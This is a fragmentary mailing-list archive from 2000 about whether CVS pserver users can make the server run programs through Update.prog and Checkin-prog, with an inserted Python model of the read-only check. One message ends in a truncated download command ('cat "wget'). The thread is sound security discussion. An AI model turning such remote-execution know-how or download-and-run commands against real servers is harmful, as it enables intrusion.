In article [EMAIL PROTECTED],
Michael Richardson [EMAIL PROTECTED] writes:
Systems that give shells out to people that have write access
are already open to running programs by clients.
So, this really affects people that use :pserver: with write
access.
The problem also affects
In article [EMAIL PROTECTED],
[EMAIL PROTECTED] (Larry Jones) writes:
It's a known problem. Like it says in the Cederqvist manual (under
"Security considerations with password authentication"):
... once a user has non-read-only access to the repository, she
can execute
In article [EMAIL PROTECTED],
[EMAIL PROTECTED] (Larry Jones) writes:
Update.prog just contains the name of the program to run, not the actual
code. If you can't commit, you can't upload arbitrary code to run, you
can only run pre-existing code on the server, and you have no control
over
"Ian" == Ian Lance Taylor [EMAIL PROTECTED] writes:
Ian This looks like a serious security problem. It appears to open
Ian anonymous CVS servers to a wide range of attack.
Correct me if I'm wrong, but it seems that one has to have commit
permissions to create these files, so in
"Karl" == Karl Fogel [EMAIL PROTECTED] writes:
Karl Sorry -- good point. I'll look at it in detail when I'm looking at it
Karl in detail, which will be early next week. In the meantime, I'll keep
Karl my mouth shut. :-)
Karl -K
Karl Ian Lance Taylor [EMAIL PROTECTED]
Ian Lance Taylor [EMAIL PROTECTED] writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It looks serious, but not for anonymous-only servers, since anonymous
users can't commit.
The hole here, I think, is that someone who
Ian Lance Taylor writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It's a known problem. Like it says in the Cederqvist manual (under
"Security considerations with password authentication"):
... once a user has
From: Karl Fogel [EMAIL PROTECTED]
Date: 28 Jul 2000 14:01:23 -0500
Ian Lance Taylor [EMAIL PROTECTED] writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It looks serious, but not for anonymous-only
Sorry -- good point. I'll look at it in detail when I'm looking at it
in detail, which will be early next week. In the meantime, I'll keep
my mouth shut. :-)
-K
Hello!
On 28 Jul 2000, Karl Fogel wrote:
Sorry -- good point. I'll look at it in detail when I'm looking at it
in detail, which will be early next week. In the meantime, I'll keep
my mouth shut. :-)
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether
Date: Fri, 28 Jul 2000 17:45:13 -0400 (EDT)
From: [EMAIL PROTECTED] (Larry Jones)
Ian Lance Taylor writes:
What if I frob Update.prog? I don't claim to understand all the cases
here, but it appears that that will be run by `cvs update'.
Update.prog just contains the name
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT)
From: Pavel Roskin [EMAIL PROTECTED]
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether commits are allowed and exits if they are not. It prints a
strange message though:
E Flag -u in modules
Date: 28 Jul 2000 14:58:08 -0700
From: Ian Lance Taylor [EMAIL PROTECTED]
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT)
From: Pavel Roskin [EMAIL PROTECTED]
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether commits are allowed
Update.prog just contains the name of the program to run, not the actual
code. If you can't commit, you can't upload arbitrary code to run, you
can only run pre-existing code on the server, and you have no control
over its input or arguments, so it's a very low-level threat.
cat "wget
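The gate Pavel and Larry are describing, as an added example that is not part of the thread and not CVS's own server.c code: a small Python model of a server-side request handler that records the Checkin-prog / Update-prog program names a client sends and refuses to record them on a read-only connection. The request names and their two-line shape (pathname on the request line, program name on the next line) follow the CVS client/server protocol; the Session class, the handler, its error text and the sample request stream are assumptions made for this illustration.

```python
"""Illustrative model of the read-only check on Update-prog / Checkin-prog.

Not CVS's code.  "Directory", "Update-prog" and "Checkin-prog" are request
names from the CVS client/server protocol; everything else here (Session,
handle_requests, the error wording, SAMPLE) is constructed for the example.
"""
from dataclasses import dataclass, field


@dataclass
class Session:
    readonly: bool                              # True for anonymous / read-only users
    update_progs: dict = field(default_factory=dict)   # local dir -> program to run after update
    checkin_progs: dict = field(default_factory=dict)  # local dir -> program to run after commit
    errors: list = field(default_factory=list)         # "E ..." lines the server would send back


def handle_requests(session, stream):
    """Consume a request stream line by line and apply the read-only gate.

    Returns the list of error lines produced.  A connection that may not
    commit never gets a program name recorded, so nothing client-chosen is
    ever queued for execution on its behalf (the point of the thread).
    """
    lines = stream.split("\n")
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("Directory "):
            # "Directory local-dir" is followed by the repository path line.
            i += 2
            continue
        if line.startswith("Update-prog ") or line.startswith("Checkin-prog "):
            req, _, path = line.partition(" ")
            prog = lines[i + 1] if i + 1 < len(lines) else ""
            i += 2
            if session.readonly:
                # Same decision serve_update_prog() is said to make above:
                # no commit permission, no program registration.
                session.errors.append(f"E {req} not allowed in readonly mode")
                continue
            table = session.update_progs if req == "Update-prog" else session.checkin_progs
            table[path] = prog
            continue
        i += 1
    return session.errors


# Constructed request stream: a client asks the server to run a program of
# the client's choosing after the next update and after the next commit.
SAMPLE = (
    "Directory .\n"
    "/repo/proj\n"
    "Update-prog .\n"
    "/tmp/client-chosen-program\n"
    "Checkin-prog .\n"
    "/usr/local/bin/notify\n"
)


if __name__ == "__main__":
    anon = Session(readonly=True)
    print("read-only errors:", handle_requests(anon, SAMPLE))
    dev = Session(readonly=False)
    handle_requests(dev, SAMPLE)
    print("write access records:", dev.update_progs, dev.checkin_progs)
```

With write access both program names are recorded exactly as the client sent them, which is the behaviour the Cederqvist warning covers; on the read-only session the handler returns two error lines and the tables stay empty.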
On Fri, Jul 28, 2000 at 05:20:13PM -0400, Larry Jones wrote:
-- the simplest fix would
be to just get rid of checkin and update programs, but I'm not sure how
people would feel about that.
It would probably remove any chance I have of getting the